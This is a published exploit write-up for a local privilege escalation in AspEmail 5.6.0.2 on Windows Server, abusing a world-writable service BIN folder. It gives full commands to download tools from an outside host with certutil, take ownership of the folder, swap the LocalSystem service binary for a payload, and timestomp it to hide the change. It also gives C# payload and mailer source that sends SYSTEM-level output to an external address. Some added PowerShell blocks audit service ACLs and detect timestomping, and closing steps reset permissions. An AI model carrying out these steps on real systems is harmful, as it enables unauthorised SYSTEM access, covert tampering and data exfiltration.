## https://sploitus.com/exploit?id=PACKETSTORM:171905
####################################################################################################################  
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #  
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #  
# Date: 13/04/2023 #  
# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #  
# Vendor Homepage: https://www.aspemail.com #  
# Software Link: https://www.aspemail.com/download.html #  
# Product: AspEmail #  
# Version: AspEmail 5.6.0.2 and all #  
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #  
# Tested on: Windows Server 2016 and Windows Server 2019 #  
# CVE : 0DAY #  
####################################################################################################################  
  
# ==================================================================================================================  
  
[+] C:\PenTest>whoami /priv  
  
PRIVILEGES INFORMATION  
----------------------  
  
Privilege Name Description State   
============================= ========================================= ========  
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled  
SeChangeNotifyPrivilege Bypass traverse checking Enabled   
SeImpersonatePrivilege Impersonate a client after authentication Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled  
  
# ==================================================================================================================  
  
* First, we test whether the AspEmail service is active.  
* With normal user rights, we list the running processes and check whether the process belonging to the service is present:  
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe  
EmailAgent.exe 4400 Persits Software EmailAgent  
  
or   
  
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe  
EmailAgent64.exe 4400 Persits Software EmailAgent  
  
* The process of the "Persits Software EmailAgent" service is in the "RUNNING" state.  
* So we now know that the AspEmail service is active.  
  
# ==================================================================================================================  
  
* We will need these:  
  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"  
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"  
  
# ==================================================================================================================  
  
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"  
  
Name: Persits Software EmailAgent  
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run  
User : LocalSystem  
ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN  
IdentityReference : Everyone  
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,   
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,   
ReadExtendedAttributes, DeleteChild, Execute/Traverse  
Status : Unknown  
UserCanStart : False  
UserCanStop : False  
  
[+] C:\PenTest>del PrivescCheck.ps1  
  
* Our checks detected a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service.  
  
# ================================================================================================================== #  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.  
  
* We do not have permission to access subdirectories.  
  
# ==================================================================================================================  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)  
DeepSecLab\psacln:(I)(OI)(CI)(N)  
DeepSecLab\psaadm:(I)(OI)(CI)(N)  
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)  
BUILTIN\Administrators:(I)(F)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
NT SERVICE\TrustedInstaller:(I)(CI)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(OI)(CI)(RX)  
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)  
  
* Unlike the other directories, we have full privileges on the service's "BIN" directory.   
* In Linux terms, this is the equivalent of chmod 0777 (rwxrwxrwx).  
  
# ==================================================================================================================  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"  
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16  
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators  
  
* This tells us that "EmailAgent.exe" was installed by an Administrator and that its owner is BUILTIN\Administrators.  
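The directory ACL and the owner check above can be turned into a host-wide audit. The following PowerShell script is an added example, not part of the original advisory: it walks every installed service, extracts the binary from the ImagePath (quoted or unquoted), and flags a service when the binary or its directory grants write-type rights to a low-privileged principal, or when the binary's owner is not a trusted account. The principal and owner lists are assumptions to adjust per environment.

```powershell
# Added example (not part of the original advisory): audit every installed service for the
# weakness shown above. A service is flagged when its binary, or the directory containing it,
# grants write-type rights to a low-privileged principal, or when the binary's owner is not a
# trusted account. Principal and owner lists are assumptions; adjust them to your environment.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$TrustedOwners = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
# Any one of these rights lets a caller replace or alter the binary, or drop a file beside it.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, WriteDacl, TakeOwnership'

function Get-ServiceBinaryPath([string]$PathName) {
    # ImagePath may be quoted ("C:\dir with spaces\x.exe" /run) or bare (C:\dir\x.exe /run).
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(\S+\.exe)') { return $Matches[1] }
    return $null
}

function Test-WeakAcl([string]$Path) {
    # Returns "principal: rights" for the first low-privileged Allow ACE with a write right, else $null.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteMask) -ne 0) {
            return "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
        }
    }
    return $null
}

foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    $findings = @()
    $weakDir = Test-WeakAcl (Split-Path -Parent $exe)
    $weakExe = Test-WeakAcl $exe
    if ($weakDir) { $findings += "directory writable by $weakDir" }
    if ($weakExe) { $findings += "binary writable by $weakExe" }
    $owner = (Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue).Owner
    if ($owner -and $TrustedOwners -notcontains $owner) { $findings += "unexpected owner $owner" }
    if ($findings.Count -gt 0) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                           Binary = $exe; Findings = ($findings -join '; ') }
    }
}
```

Run it elevated so that directories like the AspEmail parent folder can be read; on the host in this advisory it should list the EmailAgent service with "directory writable by Everyone: FullControl".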
  
# ==================================================================================================================  
  
* Now we take ownership of the "BIN" directory, since that is where we will carry out our operations.  
  
[+] C:\PenTest>whoami  
DeepSecLab\Hacker  
  
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F  
  
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN  
Successfully processed 1 files; Failed processing 0 files  
  
* All commands completed successfully. We now have full privileges on this directory.   
  
# ==================================================================================================================  
  
* Now we replace the EmailAgent binary with our own payload.   
* We are careful not to damage any files, so that every change can easily be undone.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
# ==================================================================================================================  
  
* Now we set the Last Modified, Creation and Last Accessed timestamps of the new file.  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"  
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe  
  
# ==================================================================================================================  
  
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir  
Volume in drive C has no label.  
Volume Serial Number is 0C8A-5291  
  
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin  
  
14.04.2023 16:47 <DIR> .  
14.04.2023 16:47 <DIR> ..  
01.03.2004 15:55 143.360 AspEmail.dll  
25.02.2004 16:23 188.416 AspUpload.dll  
24.09.2003 09:21 12.288 EmailAgent.exe  
24.09.2003 09:22 139.264 EmailAgentCfg.cpl  
24.09.2003 09:25 94.208 EmailLogger.dll  
24.09.2003 09:21 167.936 Null.EmailAgent.exe  
6 File(s) 745.472 bytes  
2 Dir(s) 165.936.717.824 bytes free  
  
[24.09.2003 09:21] 12.288 EmailAgent.exe  
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe  
  
* The timestamp manipulation is complete. Both files now look as if they were placed there at the same time, long ago.  
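The step above rewrites only the NTFS timestamps; the link timestamp that the compiler stores in the PE header is untouched. This added PowerShell check (not part of the advisory; the file path is the one from this page, and the one-day slack is an assumption) flags a binary whose NTFS creation or modification time predates its own link time, which cannot happen naturally.

```powershell
# Added example (not from the advisory): detect the timestomping shown above by comparing
# a PE file's link timestamp (TimeDateStamp in the COFF header) with the NTFS timestamps
# that were rewritten. A creation or last-write time earlier than the link time is suspect.
function Get-PeLinkTime([string]$Path) {
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "$Path is not a PE file (no MZ header)"
    }
    $peOffset = [System.BitConverter]::ToInt32($bytes, 0x3C)          # e_lfanew
    if ($bytes.Length -lt $peOffset + 12 -or
        [System.BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x4550) { # "PE\0\0"
        throw "$Path has no valid PE signature"
    }
    # The COFF header follows the 4-byte signature; TimeDateStamp sits at offset +8.
    $stamp = [System.BitConverter]::ToUInt32($bytes, $peOffset + 8)
    return [DateTimeOffset]::FromUnixTimeSeconds($stamp).UtcDateTime
}

function Test-Timestomp([string]$Path) {
    $linkTime = Get-PeLinkTime $Path
    $item = Get-Item -LiteralPath $Path
    $suspect = @()
    $slack = [TimeSpan]::FromDays(1)   # assumed tolerance for clock skew between build host and target
    if ($item.CreationTimeUtc + $slack -lt $linkTime)  { $suspect += 'CreationTime' }
    if ($item.LastWriteTimeUtc + $slack -lt $linkTime) { $suspect += 'LastWriteTime' }
    [pscustomobject]@{
        File         = $Path
        LinkTimeUtc  = $linkTime
        CreationUtc  = $item.CreationTimeUtc
        LastWriteUtc = $item.LastWriteTimeUtc
        Suspicious   = ($suspect -join ', ')
    }
}

# Path taken from this advisory; run against any service binary of interest.
Test-Timestomp 'C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe'
```

Binaries from deterministic (reproducible) builds carry a hash rather than a real time in this field, so a link time far in the future means "unknown", not evidence; a link time later than the file's own timestamps is the signal to act on.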
  
# ==================================================================================================================  
  
* Now we check the ownership of our payload.  
  
[+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID  
  
__PATH   
  
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   
  
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28  
  
[+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name  
  
Name   
  
DeepSecLab\Hacker   
  
EmailAgent.exe Owner: DeepSecLab\Hacker  
  
# ==================================================================================================================  
####################################################################################################################  
# [EmailAgent.exe] #  
####################################################################################################################  
  
* We program this payload so that when the server reboots (i.e. when the services are restarted),  
* it is triggered and executes the commands we want,  
* and then sends a printout of all this to the email address we specified.  
  
using System;  
using System.Linq;  
using System.Text;  
using System.Diagnostics;  
using System.IO;  
using System.Collections;  
  
namespace CliToolSpace  
{  
    class _Main  
    {  
        static void Main(string[] args)  
        {  
            // Cli is the author's own command-runner helper; its source is not included in this advisory.  
            Cli commandLine = new Cli();  
            // Runs the mailer and the batch file dropped into C:\Windows\Temp earlier.  
            commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");  
            commandLine.Execute();  
            commandLine.ToFile(@"C:\Windows\Temp\");  
        }  
    }  
}  
  
####################################################################################################################  
# [Mail.exe] #  
####################################################################################################################  
  
// Top-level statements (C# 9 or later): the whole file is the program body.  
using System;  
using System.Net.Mail;  
using System.Net;  
  
// Mail server, sender and recipient used by the author's lab.  
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");  
var mail = new MailMessage();  
mail.From = new MailAddress("mail@deepseclab.com");  
mail.To.Add("mail@hacker.com");  
mail.Subject = "Trigger Successful!";  
mail.IsBodyHtml = true;  
string htmlBody;  
htmlBody = "<strong>This server has been rebooted.</strong>";  
mail.Body = htmlBody;  
  
// Export.txt is written by Run.bat and holds the output of whoami.  
Attachment attachment;  
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");  
mail.Attachments.Add(attachment);  
  
// Authenticated submission over STARTTLS on port 587.  
SmtpServer.Port = 587;  
SmtpServer.UseDefaultCredentials = false;  
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123");  
SmtpServer.EnableSsl = true;  
SmtpServer.Timeout = int.MaxValue;  
SmtpServer.Send(mail);  
  
####################################################################################################################  
# [Run.bat] #  
####################################################################################################################  
  
REM Record which account the service runs as; Mail.exe attaches this file.  
whoami > C:\Windows\Temp\Export.txt  
REM Put the original service binary back in place.  
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin  
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe  
REM Remove the helper files that were downloaded to C:\Windows\Temp earlier.  
cd C:\Windows\Temp  
del Run.bat & del Mail.exe  
  
####################################################################################################################  
  
[+]Trigger Successful![+]  
  
[+] C:\PenTest>systeminfo | findstr "Boot Time"  
System Boot Time: 13.04.2022, 07:46:06  
  
####################################################################################################################  
# [Export.txt] #  
####################################################################################################################  
  
NT AUTHORITY\SYSTEM  
  
####################################################################################################################  
  
# ==================================================================================================================  
# ...|||[FIX]|||...  
# ==================================================================================================================  
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+]  
# ==================================================================================================================  
  
[+] C:\Administrator>sc qc "Persits Software EmailAgent"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Persits Software EmailAgent  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Persits Software EmailAgent  
DEPENDENCIES : rpcss  
SERVICE_START_NAME : LocalSystem  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"  
  
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)  
  
# ==================================================================================================================  
  
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula  
  
Accesschk v6.15 - Reports effective permissions for securable objects  
Copyright (C) 2006-2022 Mark Russinovich  
Sysinternals - www.sysinternals.com  
  
Persits Software EmailAgent  
Medium Mandatory Level (Default) [No-Write-Up]  
RW NT AUTHORITY\SYSTEM  
SERVICE_ALL_ACCESS  
RW BUILTIN\Administrators  
SERVICE_ALL_ACCESS  
  
# ==================================================================================================================  
  
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET  
  
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"  
  
Successfully processed 0 files; Failed processing 1 files  
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.  
  
DONE!  
  
# ==================================================================================================================  
  
[+] C:\Administrator>sc stop "Persits Software EmailAgent"  
  
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"  
  
* These commands are optional. They stop and restart the "Persits Software EmailAgent" service. Since the vulnerability is already fixed, I don't think this is necessary anymore.  
  
# ==================================================================================================================